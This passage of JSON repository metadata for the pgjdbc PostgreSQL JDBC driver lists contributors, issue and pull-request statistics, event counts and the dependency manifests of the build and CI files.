Cramer","email":"davecramer@gmail.com","login":"davecramer","count":26},{"name":"Sehrope Sarkuni","email":"sehrope@jackdb.com","login":"sehrope","count":21},{"name":"github-actions[bot]","email":"41898282+github-actions[bot]","login":"github-actions[bot]","count":3},{"name":"Atsushi Torikoshi","email":"atorik@gmail.com","login":"atorik","count":2},{"name":"Harinath Kanchu","email":"kanchuharinath@gmail.com","login":"harinath001","count":2},{"name":"Sanne Grinovero","email":"sanne@hibernate.org","login":"Sanne","count":2},{"name":"mjschwaiger","email":"mjschwaiger@gmail.com","login":"mjschwaiger","count":2},{"name":"shenfeng","email":"shenfeng197@gmail.com","login":"ShenFeng312","count":2},{"name":"Davide Angelocola","email":"davide.angelocola@gmail.com","login":"dfa1","count":2},{"name":"Aleksander Lantsov","email":"51023305+lantalex","login":"lantalex","count":1},{"name":"Christian Fredriksson","email":"50839054+cfredri4","login":"cfredri4","count":1},{"name":"Emmanuel Oppong","email":"eoppong@gsumail.gram.edu","login":"emmaeng700","count":1},{"name":"Goooler","email":"wangzongler@gmail.com","login":"Goooler","count":1},{"name":"Jorge Solorzano","email":"jorsol@gmail.com","login":"jorsol","count":1},{"name":"Joshua Gardner","email":"joshgardner2000@gmail.com","login":"jgardn3r","count":1},{"name":"Kairav Mittal","email":"kairavmittal@gmail.com","login":"aclfe","count":1},{"name":"Manon van Tilburg","email":"35914140+m-van-tilburg","login":"m-van-tilburg","count":1},{"name":"Mark Blakley","email":"163172869+mblakley-casana","login":"mblakley-casana","count":1},{"name":"Mohit-Attry","email":"atrrmohit@gmail.com","login":"mohitsatr","count":1},{"name":"Peter De Wachter","email":"pdewacht@gmail.com","login":"pdewacht","count":1},{"name":"Praveen Kumar","email":"praveen729483@gmail.com","login":"Praveen7294","count":1},{"name":"Robert von Burg","email":"eitch@eitchnet.ch","login":"eitch","count":1},{"name":"Simon Greatrix","email":"simon@pippsford.com","login":"simon-greatrix","count":1},{"name":"Sodekim","email":"70255432+sodekim","login":"sodekim","count":1},{"name":"Vivek Wassan","email":"65421598+vwassan","login":"vwassan","count":1},{"name":"bshehata","email":"bshehata@atlassian.com","login":"bilal-shehata","count":1},{"name":"pbe-axelor","email":"p.belloy@axelor.com","login":"pbe-axelor","count":1},{"name":"sly461","email":"32794108+sly461","login":"sly461","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-06-19T00:00:07.604Z","repositories_count":6263782,"commits_count":875002081,"contributors_count":35073099,"owners_count":1168677,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"pgjdbc/pgjdbc","html_url":"https://github.com/pgjdbc/pgjdbc","last_synced_at":"2026-06-18T23:05:10.952Z","status":"active","issues_count":373,"pull_requests_count":1211,"avg_time_to_close_issue":24957550.869281046,"avg_time_to_close_pull_request":5035780.743202417,"issues_closed_count":152,"pull_requests_closed_count":993,"pull_request_authors_count":139,"issue_authors_count":281,"avg_comments_per_issue":4.882037533512064,"avg_comments_per_pull_request":1.9595375722543353,"merged_pull_requests_count":828,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":61,"past_year_pull_requests_count":272,"past_year_avg_time_to_close_issue":1331634.04,"past_year_avg_time_to_close_pull_request":803085.4875621891,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":201,"past_year_pull_request_authors_count":27,"past_year_issue_authors_count":50,"past_year_avg_comments_per_issue":3.098360655737705,"past_year_avg_comments_per_pull_request":1.2426470588235294,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":179,"created_at":"2023-05-10T20:35:19.608Z","updated_at":"2026-06-18T23:05:10.953Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","issue_labels_count":{"table":{"enhancement":12,"performance":5,"easy":4,"ci-related":4,"bug":4,"building-and-testing":3,"datetime":3,"backward-incompatible":3,"triage/wontfix":2,"release/noteworthy-feature":2,"needs-serverside-change":2,"dependencies":2,"compat-other-vendor-drv":2,"documentation":2,"chore":1,"waiting for test-case":1,"compat-jdk-vers":1,"concurrency ( hard:) )":1,"compat-jdbc-spec":1,"nice-to-have":1,"jdk/jpms":1,"good first issue":1}},"pull_request_labels_count":{"table":{"dependencies":565,"chore":42,"building-and-testing":18,"bug":17,"performance":10,"documentation":7,"enhancement":7,"waiting-for-changes":5,"minor":3,"triage/out-of-date":3,"triage/consider-closing":2,"java":2,"triage/needs-review":2,"skip-changelog":2,"jdk/loom":1,"wrong-data":1,"security":1,"backward-incompatible":1}},"issue_author_associations_count":{"table":{"NONE":263,"MEMBER":65,"CONTRIBUTOR":45}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":663,"MEMBER":414,"NONE":133,"COLLABORATOR":1}},"issue_authors":{"table":{"vlsi":43,"davecramer":15,"SophiahHo":5,"ecki":3,"lukaseder":3,"Shalaka1197":3,"beikov":3,"DmitriyGod":3,"ng-galien":3,"OrangeDog":3,"anaconda875":2,"devrimgunduz":2,"Hans-Wu-cn":2,"rsmckinney":2,"mkarg":2,"olavloite":2,"trknz":2,"james-johnston-thumbtack":2,"ikzelf":2,"jorsol":2,"JavaUnchained":2,"live-github":2,"ShenFeng312":2,"skunkworker":2,"dwenking":2,"BbIKTOP":2,"ringerc":2,"renovate-bot":2,"juriad":1,"kdubb":1,"hashhar":1,"hmendesB2C2":1,"fqazi":1,"amasson88":1,"AlexanderSchuetz97":1,"veselov":1,"MA1GitHub":1,"axelfontaine":1,"EldarAgalarov":1,"plokhotnyuk":1,"rackaracka":1,"PavshinSV":1,"dfsilva":1,"riba2101":1,"Dmole":1,"chrullrich":1,"npltr62":1,"radist-nt":1,"shivsrivastava":1,"tract-rob":1,"reissseb":1,"mipo256":1,"bokken":1,"vtrao":1,"sebdavid":1,"danielhasan":1,"MrEasy":1,"AldrichZeng":1,"bzhaoopenstack":1,"NKame":1,"romank0":1,"mEkdal":1,"nakamura-to":1,"jeme95":1,"vpinna80":1,"faharabbas-bug-hunter":1,"amikish":1,"takeseem":1,"Chris-SP365":1,"kalaiyarasiganeshalingam":1,"praiskup":1,"xtay573269555":1,"tomdcc":1,"PavloPolovyi":1,"FrankHossfeld":1,"ul84222":1,"aixinming":1,"xc-23":1,"joejensen":1,"jerrinot":1,"rdp":1,"kustodian":1,"dlilljegren":1,"kneeraj":1,"PeterCsalaHbo":1,"goranschwarz":1,"Itworkerckl":1,"RunjeoHW":1,"avinashyn":1,"harudini":1,"Shore001":1,"ivostoykov":1,"sylvain-lemouzy-pfx":1,"CTH57":1,"chengfeng-xie":1,"inspiredyu":1,"PiotrDuz":1,"techmaddy":1,"rzuljevic":1,"Sarkos":1,"dabraham02124":1,"butopcu":1,"AFulgens":1,"chris21k":1,"labkey-martyp":1,"rlbdv":1,"cgm-aw":1,"cptnricard":1,"kevinm416":1,"sly461":1,"a75187":1,"805728578":1,"XenonAbe":1,"jackin853":1,"m-van-tilburg":1,"bykes":1,"rbygrave":1,"nrhall":1,"FranckPachot":1,"jasonchenTJ":1,"cyberb":1,"joechen2010":1,"mblakley-casana":1,"buremba":1,"jcmalek":1,"labkey-tchad":1,"cncaizheng":1,"heiko-jakob":1,"esabol":1,"Chelsea-Barraball":1,"renovate[bot]":1,"eitch":1,"aditsu":1,"tatsuo-ishii":1,"pmenke-de":1,"gtors":1,"koriit-kontakt":1,"vvavrychuk":1,"An1s9n":1,"stuartwdouglas":1,"jeevitha-vasu03":1,"pip25":1,"VladRodionov":1,"chenzhenyang":1,"bluestreak01":1,"onacit":1,"reallyinsane":1,"simon-greatrix":1,"rbsamoht":1,"wufengke":1,"ba-work":1,"mmm444":1,"superbob":1,"peixingzhe":1,"guai":1,"sumathiselvaraj":1,"paulaustin-automutatio":1,"kofemann":1,"quaff":1,"lbruun":1,"rtrier":1,"chadshowalter":1,"sehrope":1,"pdewacht":1,"tal3898":1,"leandrokemp":1,"cfredri4":1,"gnom7":1,"mgornikov":1,"MaxMello":1,"baitao061250":1,"jmfinelli":1,"ldhasson":1,"priteshranjan01":1,"qinarmy-zoro":1,"ebucxidur":1,"Itox001":1,"DavidGradwell":1,"kornel-limosys":1,"adasari":1,"anesterenok":1,"beeender":1,"imranzaheer612":1,"nvanbenschoten":1,"fritshoogland-yugabyte":1,"Naros":1,"jMediaConverter":1,"victornoel":1,"duwenice":1,"codemiha":1,"bvago-kyn":1,"yrodiere":1,"davidleetw":1,"Auskennfuchs":1,"CharlesLgn":1,"IvanPizhenko":1,"SD185415":1,"cartucciam":1,"petere":1,"evenjn":1,"andeb":1,"holgerjakobs":1,"kneth":1,"mrrao":1,"buerkle":1,"wuchubuzai2018":1,"achix":1,"embuc":1,"ocracoke":1,"stevenschlansker":1,"cowwoc":1,"timgstewart":1,"bcmedeiros":1,"robert-mirzakhanian":1,"frlzk":1,"raaivore":1,"EdithChenLi":1,"decmurphy":1,"Chr3is":1,"Squiry":1,"bdnced":1,"damixd1":1,"mjager":1,"Sanne":1,"JakeR92":1,"papegaaij":1,"ttqs5":1,"siddhsql":1,"ldming":1,"rolandjohann":1,"tsayao":1,"jptx1234":1,"donders":1,"prrvchr":1,"martin-dorey-hv":1,"eirikbakke":1,"natnan":1,"openai0229":1,"forking-renovate[bot]":1,"labanovichttps":1,"bvn13":1,"nanella":1,"Roopak-nomadia":1,"dcitron":1,"batman007db":1,"YuGe":1,"sjamaan":1,"harinath001":1,"BusyByte":1,"Timsgmlr":1,"jamesagnew":1,"ivan-ra":1,"desruisseaux":1,"pwagland":1,"anthares":1,"samaxes":1,"heimburgerj2":1,"BonusLord":1,"frederikz":1,"whitingjr":1,"melin":1,"TyeolRik":1,"mirraj2":1,"Chitrae92":1,"wgfm":1,"sodekim":1,"sshikov":1,"sa7msw":1,"PayB2020":1,"YanFenGuo":1,"Eddyzhang7":1,"natetyler":1,"gavinwang668":1,"rmagnin-efluid":1,"arturgspb":1,"Sudarvizhi-L":1,"demonti":1,"dsmolyarenko":1,"jowi-ppi":1,"SuperPat45":1,"shuiqingliu":1}},"pull_request_authors":{"table":{"renovate-bot":510,"davecramer":195,"vlsi":183,"renovate[bot]":43,"sehrope":19,"jorsol":14,"vishalvrv9":10,"SophiahHo":8,"raminorujov":6,"Dawnliving":6,"ng-galien":4,"SheerazMajeedM":4,"Zopsss":4,"imranzaheer612":4,"beikov":4,"Sasasu":4,"ecki":4,"binoverfl0w":4,"MohanadKh03":4,"qinarmy-zoro":4,"aixinming":3,"rbygrave":3,"plokhotnyuk":3,"arons":3,"ShenFeng312":3,"dependabot[bot]":3,"seregaizsbera":3,"mohitsatr":3,"damienb-opt":2,"OrangeDog":2,"jerrinot":2,"joejensen":2,"MarekUniq":2,"mkoncek":2,"mipo256":2,"awadhesh14":2,"Randgalt":2,"harinath001":2,"reneleonhardt":2,"sgrayson21":2,"vwassan":2,"hginzel":2,"ajacob98":2,"anesterenok":2,"crowmagnumb":2,"mmm444":2,"kneth":2,"Anmol202005":2,"priteshranjan01":2,"maffe":2,"Sineaggi":2,"crunchyjohn":2,"svorcmar":2,"hlcianfagna":2,"lucifer-Technoking":2,"reallyinsane":2,"ljavorsk":2,"Chris-SP365":2,"dh-cloud":2,"hfhbd":2,"atorik":2,"pip25":2,"MrEasy":2,"minfrin":2,"CharlesLgn":2,"tirthgajera":2,"nvanbenschoten":2,"haumacher":2,"kimjand":2,"bilalshehata":2,"inhabitantNewCity":1,"mahmoudbahaa":1,"gmokki":1,"nrhall":1,"zhurs":1,"bdelbosc":1,"sly461":1,"kneeraj":1,"JosephBorodach":1,"pmenke-de":1,"JelteF":1,"simon-greatrix":1,"rhavermans":1,"kdubb":1,"ahachete":1,"pyup-bot":1,"frode-carlsen":1,"lopata2":1,"bersace":1,"desruisseaux":1,"ringerc":1,"cfredri4":1,"mblakley-casana":1,"jgardn3r":1,"AlexElin":1,"jmfinelli":1,"cgm-aw":1,"tordmjohnson":1,"reda-alaoui":1,"wegendt-bosch":1,"stuartwdouglas":1,"japinli":1,"dennis-benzinger-hybris":1,"MSGoodman":1,"bremac":1,"yamert89":1,"devs-lair":1,"decmurphy":1,"sfeigl":1,"Squiry":1,"BusyByte":1,"emmaeng700":1,"ancoron":1,"jycr":1,"lantalex":1,"remotefish":1,"desiderantes":1,"radist-nt":1,"chrullrich":1,"ash211":1,"fqazi":1,"bzhaoopenstack":1,"ilovethebeatles":1,"sodekim":1,"helloJosh":1,"marschall":1,"zkorhone":1,"peixingzhe":1,"robert-mirzakhanian":1,"jesperpedersen":1,"mmimica":1,"m-van-tilburg":1,"dfa1":1,"agabara":1,"iseki0":1,"prokop7":1,"praiskup":1,"bokken":1,"mchyzer":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-06-19T00:00:10.812Z","repositories_count":14815478,"issues_count":33043167,"pull_requests_count":109030753,"authors_count":11311401,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"dependencies":2}},"past_year_pull_request_labels_count":{"table":{"dependencies":114,"chore":25,"bug":14,"building-and-testing":13,"documentation":6,"enhancement":4,"performance":3}},"past_year_issue_author_associations_count":{"table":{"NONE":40,"MEMBER":11,"CONTRIBUTOR":10}},"past_year_pull_request_author_associations_count":{"table":{"MEMBER":131,"CONTRIBUTOR":126,"NONE":14}},"past_year_issue_authors":{"table":{"vlsi":10,"ShenFeng312":2,"renovate-bot":2,"lukaseder":1,"martin-dorey-hv":1,"mblakley-casana":1,"mipo256":1,"mkarg":1,"m-van-tilburg":1,"papegaaij":1,"pdewacht":1,"qinarmy-zoro":1,"quaff":1,"reissseb":1,"rlbdv":1,"Sanne":1,"Sarkos":1,"simon-greatrix":1,"sly461":1,"sodekim":1,"Sudarvizhi-L":1,"sylvain-lemouzy-pfx":1,"takeseem":1,"wgfm":1,"wufengke":1,"aditsu":1,"AFulgens":1,"amasson88":1,"batman007db":1,"BonusLord":1,"cfredri4":1,"chengfeng-xie":1,"Chitrae92":1,"CTH57":1,"damixd1":1,"davecramer":1,"desruisseaux":1,"Dmole":1,"duwenice":1,"eitch":1,"faharabbas-bug-hunter":1,"frederikz":1,"frlzk":1,"harinath001":1,"harudini":1,"ivan-ra":1,"jptx1234":1,"labanovichttps":1,"labkey-martyp":1,"leandrokemp":1}},"past_year_pull_request_authors":{"table":{"renovate-bot":111,"vlsi":83,"davecramer":36,"sehrope":11,"ShenFeng312":3,"atorik":2,"beikov":2,"bilalshehata":2,"vwassan":2,"harinath001":2,"raminorujov":2,"yamert89":1,"sodekim":1,"sly461":1,"simon-greatrix":1,"reda-alaoui":1,"m-van-tilburg":1,"mblakley-casana":1,"lantalex":1,"jorsol":1,"jgardn3r":1,"helloJosh":1,"emmaeng700":1,"dfa1":1,"devs-lair":1,"cfredri4":1}},"maintainers":[{"table":{"login":"vlsi","count":226,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"}},{"table":{"login":"davecramer","count":210,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"}},{"table":{"login":"sehrope","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"}},{"table":{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"}},{"table":{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"}},{"table":{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"}},{"table":{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}},{"table":{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}}],"active_maintainers":[{"table":{"login":"vlsi","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"}},{"table":{"login":"davecramer","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"}},{"table":{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"}},{"table":{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"}}]}},"events":{"total":{"CreateEvent":11,"CommitCommentEvent":1,"ReleaseEvent":1,"DeleteEvent":2,"PullRequestEvent":528,"ForkEvent":58,"DiscussionEvent":1,"IssuesEvent":138,"WatchEvent":155,"IssueCommentEvent":899,"PushEvent":309,"PullRequestReviewCommentEvent":242,"PullRequestReviewEvent":251},"last_year":{"CreateEvent":6,"CommitCommentEvent":1,"ReleaseEvent":1,"DeleteEvent":1,"PullRequestEvent":200,"ForkEvent":13,"DiscussionEvent":1,"IssuesEvent":41,"WatchEvent":52,"IssueCommentEvent":244,"PushEvent":150,"PullRequestReviewCommentEvent":53,"PullRequestReviewEvent":50}},"keywords":["java","jdbc","postgresql"],"dependencies":[{"ecosystem":"maven","filepath":"build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:22.552Z","updated_at":"2023-01-13T12:15:22.552Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build.gradle.kts","dependencies":[{"id":6875793484,"package_name":"org.junit.jupiter:junit-jupiter-api","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875793485,"package_name":"uk.org.webcompere:system-stubs-jupiter","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875793486,"package_name":"org.junit.jupiter:junit-jupiter-params","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875793487,"package_name":"org.hamcrest:hamcrest","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875793488,"package_name":"org.junit.jupiter:junit-jupiter-engine","ecosystem":"maven","requirements":"*","direct":true,"kind":"testRuntimeOnly","optional":false},{"id":6875793489,"package_name":"junit:junit","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875793490,"package_name":"org.junit.vintage:junit-vintage-engine","ecosystem":"maven","requirements":"*","direct":true,"kind":"testRuntimeOnly","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/buildcache.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:19.739Z","updated_at":"2023-01-13T12:15:19.739Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/buildcache.yml","dependencies":[{"id":6875783798,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875783799,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":6875783800,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/debezium.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:20.209Z","updated_at":"2023-01-13T12:15:20.209Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/debezium.yml","dependencies":[{"id":6875784787,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875784788,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875784789,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/fedora-copr-build.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:20.816Z","updated_at":"2023-01-13T12:15:20.816Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/fedora-copr-build.yml","dependencies":[{"id":6875786110,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/gradle-wrapper-validation.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:21.127Z","updated_at":"2023-01-13T12:15:21.127Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/gradle-wrapper-validation.yml","dependencies":[{"id":6875789295,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6875789296,"package_name":"gradle/wrapper-validation-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/main.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:21.482Z","updated_at":"2023-01-13T12:15:21.482Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/main.yml","dependencies":[{"id":6875789532,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875789533,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875789534,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":6875789535,"package_name":"AdoptOpenJDK/install-jdk","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/nightlysnapshot.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:21.650Z","updated_at":"2023-01-13T12:15:21.650Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/nightlysnapshot.yml","dependencies":[{"id":6875789721,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875789722,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875789723,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/omni.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:22.087Z","updated_at":"2023-01-13T12:15:22.087Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/omni.yml","dependencies":[{"id":6875791273,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875791276,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875791277,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":6875791278,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"a1ed4b322b4b38cb846afb5a0ebfa17086917d27","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"docker","filepath":"docker/postgres-head/Dockerfile","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:22.187Z","updated_at":"2023-01-13T12:15:22.187Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/docker/postgres-head/Dockerfile","dependencies":[{"id":6875791311,"package_name":"ubuntu","ecosystem":"docker","requirements":"20.04","direct":true,"kind":"build","optional":false}]},{"ecosystem":"docker","filepath":"docker/postgres-server/docker-compose.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:22.333Z","updated_at":"2023-01-13T12:15:22.333Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/docker/postgres-server/docker-compose.yml","dependencies":[{"id":6875791785,"package_name":"postgres","ecosystem":"docker","requirements":"${PGV","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"maven","filepath":"pgjdbc/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:23.042Z","updated_at":"2023-01-13T12:15:23.042Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/pgjdbc/build.gradle.kts","dependencies":[{"id":6875794889,"package_name":"org.checkerframework:checker-qual","ecosystem":"maven","requirements":"*","direct":true,"kind":"implementation","optional":false},{"id":6875794891,"package_name":"se.jiderhamn:classloader-leak-test-framework","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false}]},{"ecosystem":"maven","filepath":"pgjdbc-osgi-test/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:23.235Z","updated_at":"2023-01-13T12:15:23.235Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/pgjdbc-osgi-test/build.gradle.kts","dependencies":[{"id":6875794919,"package_name":"javax:javaee-api","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794920,"package_name":"org.osgi:org.osgi.service.jdbc","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794923,"package_name":"org.ops4j.pax.exam:pax-exam-container-native","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794924,"package_name":"org.ops4j.pax.exam:pax-exam-junit4","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794925,"package_name":"org.ops4j.pax.exam:pax-exam-link-mvn","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794926,"package_name":"org.ops4j.pax.url:pax-url-aether","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794927,"package_name":"org.apache.felix:org.apache.felix.framework","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794928,"package_name":"ch.qos.logback:logback-core","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false},{"id":6875794929,"package_name":"ch.qos.logback:logback-classic","ecosystem":"maven","requirements":"*","direct":true,"kind":"testImplementation","optional":false}]},{"ecosystem":"maven","filepath":"test-gss/build.gradle","sha":null,"kind":"manifest","created_at":"2023-01-13T12:15:23.396Z","updated_at":"2023-01-13T12:15:23.396Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/test-gss/build.gradle","dependencies":[{"id":6875795131,"package_name":"org.codehaus.groovy:groovy-all","ecosystem":"maven","requirements":"3.0.11","direct":true,"kind":"implementation","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release-drafter.yml","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:13.181Z","updated_at":"2023-07-05T17:00:13.181Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/.github/workflows/release-drafter.yml","dependencies":[{"id":11146418501,"package_name":"release-drafter/release-drafter","ecosystem":"actions","requirements":"v5","direct":true,"kind":"composite","optional":false},{"id":11146418502,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":11146418503,"package_name":"actions/setup-java","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":11146418504,"package_name":"burrunan/gradle-cache-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":11146418505,"package_name":"actions/github-script","ecosystem":"actions","requirements":"v6","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"maven","filepath":"build-logic/java-comment-preprocessor/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:14.691Z","updated_at":"2023-07-05T17:00:14.691Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build-logic/java-comment-preprocessor/build.gradle.kts","dependencies":[{"id":11146420769,"package_name":"com.igormaznitsa:jcp","ecosystem":"maven","requirements":"7.0.5","direct":true,"kind":"implementation","optional":false},{"id":11146420773,"package_name":"com.github.vlsi.gradle-extensions:com.github.vlsi.gradle-extensions.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false}]},{"ecosystem":"maven","filepath":"build-logic/jvm/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:14.936Z","updated_at":"2023-07-05T17:00:14.936Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build-logic/jvm/build.gradle.kts","dependencies":[{"id":11146420777,"package_name":"com.github.vlsi.crlf:com.github.vlsi.crlf.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false},{"id":11146420778,"package_name":"com.github.vlsi.gradle-extensions:com.github.vlsi.gradle-extensions.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false},{"id":11146420779,"package_name":"org.jetbrains.kotlin:kotlin-gradle-plugin","ecosystem":"maven","requirements":"*","direct":true,"kind":"implementation","optional":false},{"id":11146420780,"package_name":"com.github.autostyle:com.github.autostyle.gradle.plugin","ecosystem":"maven","requirements":"3.2","direct":true,"kind":"implementation","optional":false},{"id":11146420786,"package_name":"com.github.vlsi.jandex:com.github.vlsi.jandex.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false}]},{"ecosystem":"maven","filepath":"build-logic/publishing/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:15.158Z","updated_at":"2023-07-05T17:00:15.158Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build-logic/publishing/build.gradle.kts","dependencies":[{